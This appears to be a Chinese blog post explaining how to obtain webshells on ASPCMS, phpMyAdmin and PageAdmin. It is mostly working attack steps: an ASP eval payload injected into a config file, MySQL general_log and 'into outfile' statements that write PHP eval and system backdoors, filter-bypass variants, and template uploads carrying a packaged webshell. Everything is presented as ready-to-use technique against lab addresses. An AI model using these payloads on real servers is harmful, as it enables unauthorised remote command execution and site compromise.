ASPCMS273 PhPMyadmin Pageadmin拿shell

starhei.zxy2024-08-04 12:33

一、ASPCMS

ASPCMS是由上谷网络开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且支持模版自定义、支持扩展插件等等,能够在短时间内完成企业建站。

1.后台修改配置文件拿Shell

步骤一:访问并登陆到后台(这里注意在搭建站点的时候注意权限问题)

#网站后台http://192.168.4.139/admin_aspcms/login.asp

username:admin

password:123456

2.点击【扩展功能】--》【幻灯片设置】--》点击 【保存】--》开启代理进行抓包

3.在抓取的数据包中修改 slideTextstatus 字段的值为以下代码并进行发包查看被修改的asp文件内容

#字段值

1%25><%25Eval(Request(chr(65)))25><%25 密码是a

#影响文件

/config/AspCms_Config.asp

4.访问以下地址进行连接.

http://192.168.233.141:81/config/AspCms_Config.asp

二、PhPMyadmin

1.通过日志文件拿Shell

利用mysql日志文件写shell,这个日志可以在mysql里改变它的存放位置,登录phpmyadmin可以修改这个存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取一个webshell。

show global variables like '%general%';

set global general_log='on'; //⽇志保存状态开启;

set global general_log_file = 'D:/phpstudy_pro/WWW/mafa.php' //修 改⽇志的保存位置。

show global variables like '%general%';

select '<?php eval($_POST["admin"]);?>';

bypass:

select+'<?php+phpinfo();+?>'

select+'<?php+//%0Aphpinfo();+?>'

2.导入导出拿WebShell

1.⾸先判断mysql位置

select @@datadir

路径:D:\phpstudy_pro\Extensions\MySQL5.7.26\data\

2.猜测web路径 猜测web路径:

D:\phpstudy_pro\\www

D:\phpstudy_pro\\WWW\web.php

3.写webshell

select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy_pro/www/b.php';

select "<?php+//%0Aeval($_POST[a]);?>" into outfile 'D:/phpstudy_pro/www/b.php';

select "<?php system($_GET[a]);?>" into outfile 'D:/phpstudy_pro/PHPTutorial/www/d.php';

4.浏览器

http://192.168.2.8/d.php?a=dir ..\ select "?php phpinfo();eval($_POST[a]);?>" into outfile 'C:\phpStudy\WWW \web.php';

备注:/

不要⽤\,如⾥要⽤\\(转义)

3.界⾯图像化GetShell

如果过滤了 into outfile 第⼀种的图形化操作

复制代码 
phpmyadmin管理台
变量:⽇志 搜索:gen
log:on
file:C:\phpStudy\PHPTutorial\www\c.php
sql:
select "<?php eval($_POST[a]);?>";

GitHub - MzzdToT/phpmyadmin_fuzz: phpmyadmin批量弱口令爆破。

三、Pageadmin

PageAdmin CMS系统是基于.Net的⽹站管理系统,安全、稳定、灵活,全国⽤户超过百万,致⼒于为 企业、学校、政府⽹站建设和⽹站制作提供企业级内容管理系统解决⽅案。

姿势⼀:上传模块拿WebShell

在pageadmin后台可以上传模板,把webshell打包成zip上传模板,系统会⾃动解压,成功会 在后台存在后⻔,访问即可获取webshell 。

步骤⼀:访问 pageadmin 在后台可以上传模板,把webshell打包成zip上传模板,系统会⾃动解压, 成功会在后台存在后⻔,访问即可获取webshell 。 点击【应⽤】--》【 插件安装】--》【 上传⽂件

复制代码 
这⾥因为不是授权版本,⽆法上传,如果有授权版本的话就可以成功上传,上传后系统会⾃动解压,直
接访问shell地址就可以了:/Templates/shell/shell.aspx

姿势⼆:上传⽂件解压拿WebShell

点击【⼯具】--》 【⽂件管理】--》 【功能菜单】 --》【上传⽂件】--》 【解压】

文件上传哥斯拉生成的

getshell

相关推荐
程序员阿鹏12 分钟前
Git的安装和配置(idea中配置Git)
java·开发语言·ide·git·intellij-idea·idea
景天科技苑24 分钟前
【Rust trait特质】如何在Rust中使用trait特质,全面解析与应用实战
开发语言·后端·rust·trait·rust trait·rust特质
PacosonSWJTU28 分钟前
python使用matplotlib画图
开发语言·python·matplotlib
Inverse16234 分钟前
C语言_自定义类型:结构体
c语言·开发语言·算法
enyp8042 分钟前
Qt原型模式实现与应用
开发语言·qt·原型模式
CryptoRzz1 小时前
印度尼西亚数据源对接技术指南
开发语言·python·websocket·金融·区块链
zyx没烦恼1 小时前
unordered_map和unordered的介绍和使用
开发语言·c++
User_芊芊君子2 小时前
【Java面试题】——this 和 super 的区别
java·开发语言
柴薪之王、睥睨众生2 小时前
(自用)Java学习-5.8(总结,springboot)
java·开发语言·spring boot·学习·mybatis
牛马baby2 小时前
Java高频面试之并发编程-17
java·开发语言·面试
热门推荐
01YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】02从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑03KGG转MP3工具|非KGM文件|解密音频04【解决】Android Gradle Sync 报错 Could not read workspace metadata05【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!06DeepSeek各版本说明与优缺点分析07苍穹外卖面试总结08Coze扣子平台完整体验和实践(附国内和国际版对比)09西电B测-计算机网络综合实验(含验收问题)10VMware虚拟机安装Win7专业版保姆级教程(附镜像包)